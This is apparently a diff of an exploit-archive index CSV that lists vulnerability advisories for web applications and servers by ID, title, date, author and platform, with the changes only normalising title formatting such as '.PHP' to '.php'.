+23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.php Cross-Site Scripting Vulnerability",2003-12-23,"David S. Ferreira",php,webapps,0 +23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.php Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 +23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - Privmsg.php Cross-Site Scripting Vulnerability",2003-12-23,"Ben Drysdale",php,webapps,0 23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Include Vulnerability",2003-12-24,"Zero X",php,webapps,0 23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 desc Parameter XSS",2003-12-24,"Andrew Smith",php,webapps,0 23478,platforms/php/webapps/23478.txt,"Psychoblogger PB-beta1 errormessage XSS",2003-12-24,"Andrew Smith",php,webapps,0 @@ -20696,7 +20696,7 @@ id,file,description,date,author,platform,type,port 23480,platforms/windows/dos/23480.txt,"Surfboard httpd 1.1.9 - Remote Buffer Overflow Vulnerability",2003-12-26,"decka trash",windows,dos,0 23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)",2003-12-26,"Steve Grubb",linux,local,0 23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)",2003-12-26,"frauk\x41ser",linux,local,0 -23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 Board.PHP Cross-Site Scripting Vulnerability",2003-12-27,gr00vy,php,webapps,0 +23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 Board.php Cross-Site Scripting Vulnerability",2003-12-27,gr00vy,php,webapps,0 23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module SQL Injection Vulnerability",2003-12-27,idtwolf@pisem.net,php,webapps,0 23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - index.php Page Parameter Cross-Site Scripting Vulnerability",2003-12-27,"David S. Ferreira",php,webapps,0 @@ -20736,7 +20736,7 @@ id,file,description,date,author,platform,type,port 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting Vulnerability",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 -23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.PHP Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 +23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting Vulnerability",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 @@ -20753,7 +20753,7 @@ id,file,description,date,author,platform,type,port 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability",2004-01-09,badpack3t,windows,dos,0 23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script Information Disclosure Vulnerability",2004-01-10,"Cabezon Aurelien",php,webapps,0 -23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0 +23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.php Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service Vulnerability",2004-01-12,dr_insane,windows,dos,0 23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 Controls Format String Vulnerability",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 23540,platforms/freebsd/dos/23540.c,"KAME Racoon 'Initial Contact' SA Deletion Vulnerability",2004-01-14,"Thomas Walpuski",freebsd,dos,0 @@ -20770,7 +20770,7 @@ id,file,description,date,author,platform,type,port 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x userchannel.pl op Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4_Sun JDK 1.4.2 JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include Vulnerability",2004-01-19,Yo_Soy,php,webapps,0 -23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.PHP ID_MEMBER SQL Injection Vulnerability",2004-01-19,BaCkSpAcE,php,webapps,0 +23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.php ID_MEMBER SQL Injection Vulnerability",2004-01-19,BaCkSpAcE,php,webapps,0 23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x - Directory Management Policy Bypass Vulnerability",2004-01-19,"Luigi Auriemma",windows,remote,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component Content-Length Value Remote Denial of Service Vulnerability",2004-01-19,"Luigi Auriemma",multiple,dos,0 23557,platforms/multiple/remote/23557.txt,"aiptek netcam webserver 0.93.15 - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 @@ -20821,7 +20821,7 @@ id,file,description,date,author,platform,type,port 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross-Site Scripting Vulnerability",2004-01-26,"César Fernández",solaris,remote,0 23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2004-01-26,"Ben Drysdale",php,webapps,0 -23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.PHP Remote File Include Vulnerability",2004-01-26,"Himeur Nourredine",php,webapps,0 +23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.php Remote File Include Vulnerability",2004-01-26,"Himeur Nourredine",php,webapps,0 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 @@ -20832,7 +20832,7 @@ id,file,description,date,author,platform,type,port 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review Directory Traversal Vulnerability",2004-01-29,"Zone-h Security Team",cgi,webapps,0 23616,platforms/php/webapps/23616.txt,"PhpGedView 2.x Editconfig_gedcom.php Directory Traversal Vulnerability",2004-01-30,"Cedric Cochin",php,webapps,0 23617,platforms/php/webapps/23617.txt,"PhpGedView 2.x - [GED_File]_conf.php Remote File Include Vulnerability",2004-01-30,"Cedric Cochin",php,webapps,0 -23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x Browser.PHP Directory Traversal Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0 +23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x Browser.php Directory Traversal Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0 23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 @@ -20853,7 +20853,7 @@ id,file,description,date,author,platform,type,port 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service Vulnerability",2004-02-03,blackangels,hardware,dos,0 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0 -23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x Export.PHP File Disclosure Vulnerability",2004-02-03,"Cedric Cochin",php,webapps,0 +23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure Vulnerability",2004-02-03,"Cedric Cochin",php,webapps,0 23641,platforms/multiple/dos/23641.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service Vulnerability (1)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23642,platforms/multiple/dos/23642.txt,"Cauldron Chaser 1.4/1.5 - Remote Denial of Service Vulnerability (2)",2004-02-03,"Luigi Auriemma",multiple,dos,0 23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability",2004-02-03,"Andreas Sandblad",windows,remote,0 @@ -20913,8 +20913,8 @@ id,file,description,date,author,platform,type,port 23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability (1)",2004-02-16,gsicht,windows,dos,0 23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability (2)",2004-02-16,NoRpiuS,windows,dos,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 Quote Parameter SQL Injection Vulnerability",2004-02-16,BaCkSpAcE,php,webapps,0 -23711,platforms/php/webapps/23711.txt,"Ecommerce Corporation Online Store Kit 3.0 More.PHP id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 -23712,platforms/php/webapps/23712.txt,"Ecommerce Corporation Online Store Kit 3.0 More.PHP XSS",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23711,platforms/php/webapps/23711.txt,"Ecommerce Corporation Online Store Kit 3.0 More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 +23712,platforms/php/webapps/23712.txt,"Ecommerce Corporation Online Store Kit 3.0 More.php XSS",2003-02-17,"David Sopas Ferreira",php,webapps,0 23713,platforms/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service Vulnerability",2004-02-17,"Donato Ferrante",windows,dos,0 23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 GET Request Buffer Overflow Vulnerability",2004-02-13,badpack3t,windows,remote,0 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service Vulnerabilities",2004-02-17,SecuriTeam,windows,dos,0 @@ -21024,9 +21024,9 @@ id,file,description,date,author,platform,type,port 23818,platforms/php/webapps/23818.txt,"Phorum 3.x register.php HTTP_REFERER XSS",2004-03-15,JeiAr,php,webapps,0 23819,platforms/php/webapps/23819.txt,"Phorum 3.x login.php HTTP_REFERER XSS",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x profile.php target Parameter XSS",2004-03-15,JeiAr,php,webapps,0 -23821,platforms/php/webapps/23821.php,"PHPBB 1.x/2.0.x Search.PHP Search_Results Parameter SQL Injection Vulnerability",2004-01-04,pokleyzz,php,webapps,0 -23822,platforms/php/webapps/23822.txt,"VBulletin 3.0 ForumDisplay.PHP Cross-Site Scripting Vulnerability",2004-03-16,JeiAr,php,webapps,0 -23823,platforms/php/webapps/23823.txt,"VBulletin 3.0 ShowThread.PHP Cross-Site Scripting Vulnerability",2004-03-16,JeiAr,php,webapps,0 +23821,platforms/php/webapps/23821.php,"PHPBB 1.x/2.0.x Search.php Search_Results Parameter SQL Injection Vulnerability",2004-01-04,pokleyzz,php,webapps,0 +23822,platforms/php/webapps/23822.txt,"VBulletin 3.0 ForumDisplay.php Cross-Site Scripting Vulnerability",2004-03-16,JeiAr,php,webapps,0 +23823,platforms/php/webapps/23823.txt,"VBulletin 3.0 ShowThread.php Cross-Site Scripting Vulnerability",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 index.php Multiple Parameter XSS",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 index.php mos_change_template Parameter XSS",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - CSRF Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 @@ -21034,7 +21034,7 @@ id,file,description,date,author,platform,type,port 23830,platforms/linux/dos/23830.py,"Astium VoIP PBX <= 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 23831,platforms/php/webapps/23831.py,"Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 -23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 Index.PHP SQL Injection Vulnerability",2004-03-16,JeiAr,php,webapps,0 +23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 Index.php SQL Injection Vulnerability",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 Image Tag Admin Command Execution Vulnerability",2004-03-16,"Janek Vind",php,webapps,0 23836,platforms/windows/remote/23836.txt,"IBM Lotus Domino 6/7 HTTP webadmin.nsf Directory Traversal Vulnerability",2004-03-17,dr_insane,windows,remote,0 23837,platforms/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 HTTP webadmin.nsf Quick Console Cross-Site Scripting Vulnerability",2004-03-17,dr_insane,windows,remote,0 @@ -21065,7 +21065,7 @@ id,file,description,date,author,platform,type,port 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 NEWS_LOGIN Cookie ADMIN Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal Vulnerability",2004-03-22,"Donato Ferrante",linux,remote,0 -23865,platforms/php/webapps/23865.txt,"VBulletin 2.x - Private.PHP Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 +23865,platforms/php/webapps/23865.txt,"VBulletin 2.x - Private.php Cross-Site Scripting Vulnerability",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injection Vulnerabilities",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 Comments function id Parameter SQL Injection Vulnerability",2004-03-22,JeiAr,php,webapps,0 @@ -21105,7 +21105,7 @@ id,file,description,date,author,platform,type,port 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing Vulnerability",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download Vulnerability",2004-04-01,"Donato Ferrante",windows,remote,0 23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability",2004-04-03,K-159,cgi,webapps,0 -23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 MyHome.PHP SQL Injection Vulnerability",2004-04-05,"Mark Tesn",php,webapps,0 +23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 MyHome.php SQL Injection Vulnerability",2004-04-05,"Mark Tesn",php,webapps,0 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21133,12 +21133,12 @@ id,file,description,date,author,platform,type,port 23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 index.php language Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 view.php id Parameter XSS",2004-04-07,"Janek Vind",php,webapps,0 23936,platforms/linux/remote/23936.pl,"lcdproc lcdd 0.x/4.x - Multiple Vulnerabilities",2004-04-08,wsxz,linux,remote,0 -23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 viewmail.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 -23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 Index XSS",2004-04-08,dr_insane,cgi,webapps,0 -23939,platforms/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 members.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 -23940,platforms/cgi/webapps/23940.txt,"1st Class Mail Server 4.0 1 general.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 -23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 advanced.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 -23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 list.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 +23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 - viewmail.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 +23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 - Index XSS",2004-04-08,dr_insane,cgi,webapps,0 +23939,platforms/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 - members.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 +23940,platforms/cgi/webapps/23940.txt,"1st Class Mail Server 4.0 1 - general.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 +23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 +23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service Vulnerability",2004-04-09,"Donato Ferrante",linux,dos,0 23944,platforms/windows/dos/23944.php,"Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap <= 0.7.5.1 - Stack Overflow Vulnerability",2013-01-07,"Sajjad Pourali",unix,dos,0 @@ -21201,7 +21201,7 @@ id,file,description,date,author,platform,type,port 24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 query.php Multiple Parameter XSS",2004-04-15,JeiAr,php,webapps,0 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter XSS",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x Email Attachment Script Injection Vulnerability",2004-04-15,"spiffomatic 64",php,webapps,0 -24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.PHP Remote File Include Command Injection Vulnerability",2004-04-15,jaguar,php,webapps,0 +24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.php Remote File Include Command Injection Vulnerability",2004-04-15,jaguar,php,webapps,0 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service Vulnerability",2004-04-15,anonymous,windows,dos,0 24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 Malformed STUN Packet Denial of Service Vulnerability",2004-04-08,storm,multiple,dos,0 24012,platforms/windows/remote/24012.html,"WinSCP 3.5.6 Long URI Handling Memory Corruption Vulnerability",2004-04-16,"Luca Ercoli",windows,remote,0 @@ -21215,7 +21215,7 @@ id,file,description,date,author,platform,type,port 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,metasploit,windows,remote,0 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service Vulnerability",2013-01-10,"High-Tech Bridge SA",windows,dos,0 -24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 and 1.3.6 - Denial of Service Vulnerability",2013-01-10,UberLame,hardware,dos,0 +24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service Vulnerability",2013-01-10,UberLame,hardware,dos,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution Vulnerability",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender AvxScanOnlineCtrl COM Object Information Disclosure Vulnerability",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x album_portal.php Remote File Include Vulnerability",2004-04-19,Officerrr,php,webapps,0 @@ -21230,7 +21230,7 @@ id,file,description,date,author,platform,type,port 24035,platforms/php/webapps/24035.txt,"phProfession 2.5 upload.php Direct Request Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 24036,platforms/php/webapps/24036.txt,"phProfession 2.5 modules.php jcode Parameter XSS",2004-04-23,"Janek Vind",php,webapps,0 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 openwindow.php hlpfile Parameter XSS",2004-04-21,"Janek Vind",php,webapps,0 -24038,platforms/linux/remote/24038.txt,"Xine 0.9.x And Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 +24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 beta Database Disclosure Vulnerability",2004-04-22,CyberTal0n,asp,webapps,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection Vulnerability",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0 @@ -21311,7 +21311,7 @@ id,file,description,date,author,platform,type,port 24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x Help Protocol Remote Code Execution Vulnerability",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24123,platforms/linux/local/24123.sh,"WGet 1.x Insecure File Creation Race Condition Vulnerability",2004-05-17,"Hugo Vazquez",linux,local,0 -24124,platforms/php/webapps/24124.txt,"VBulletin 1.0/2.x/3.0 Index.PHP User Interface Spoofing Weakness",2004-05-17,p0rk,php,webapps,0 +24124,platforms/php/webapps/24124.txt,"VBulletin 1.0/2.x/3.0 Index.php User Interface Spoofing Weakness",2004-05-17,p0rk,php,webapps,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP Self-Executing Folder Vulnerability",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x File Manager Directory Traversal Vulnerability",2004-05-17,Rene,php,webapps,0 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x Modpath Parameter Potential File Include Vulnerability",2004-05-17,waraxe,php,webapps,0 @@ -21324,7 +21324,7 @@ id,file,description,date,author,platform,type,port 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability",2004-05-18,henkie_is_leet,windows,dos,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x Embedded Image URI Obfuscation Weakness",2004-05-18,"Drew Copley",linux,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 Embedded Image URI Obfuscation Weakness",2004-05-19,"Lyndon Durham",multiple,remote,0 -24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 Log.PHP HTML Injection Vulnerability",2004-05-21,Chinchilla,php,webapps,0 +24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 Log.php HTML Injection Vulnerability",2004-05-21,Chinchilla,php,webapps,0 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple XSS Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass Vulnerability",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation Vulnerability",2004-05-24,"Rob Brown",linux,local,0 @@ -21341,7 +21341,7 @@ id,file,description,date,author,platform,type,port 24152,platforms/php/webapps/24152.txt,"Land Down Under BBCode HTML Injection Vulnerability",2004-05-29,"Tim De Gier",php,webapps,0 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 usersettings.php avmsg Parameter XSS",2004-05-29,"Janek Vind",php,webapps,0 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature XSS",2004-05-29,"Janek Vind",php,webapps,0 -24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 SSI.PHP SQL Injection Vulnerability",2004-06-11,JvdR,php,webapps,0 +24186,platforms/php/webapps/24186.txt,"Invision Power Board 1.3 SSI.php SQL Injection Vulnerability",2004-06-11,JvdR,php,webapps,0 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness",2003-08-23,Jelmer,windows,remote,0 24188,platforms/cgi/webapps/24188.pl,"Blackboard Learning System 6.0 Dropbox File Download Vulnerability",2004-06-10,"Maarten Verbeek",cgi,webapps,0 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1_ Opera 7.51 - URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 @@ -21383,7 +21383,7 @@ id,file,description,date,author,platform,type,port 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0 24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 Next_file Parameter Cross-Site Scripting Vulnerability",2004-06-14,scriptX,cgi,webapps,0 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting Vulnerability",2004-06-14,"Thomas Ryan",asp,webapps,0 -24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 SSI.PHP Cross-Site Scripting Vulnerability",2004-06-14,"IMAN Sharafoddin",php,webapps,0 +24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 SSI.php Cross-Site Scripting Vulnerability",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass Vulnerability",2004-06-14,"Tan Chew Keong",windows,local,0 24201,platforms/php/webapps/24201.txt,"php-Charts Arbitrary PHP Code Execution Vulnerability",2013-01-18,AkaStep,php,webapps,0 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 @@ -21397,7 +21397,7 @@ 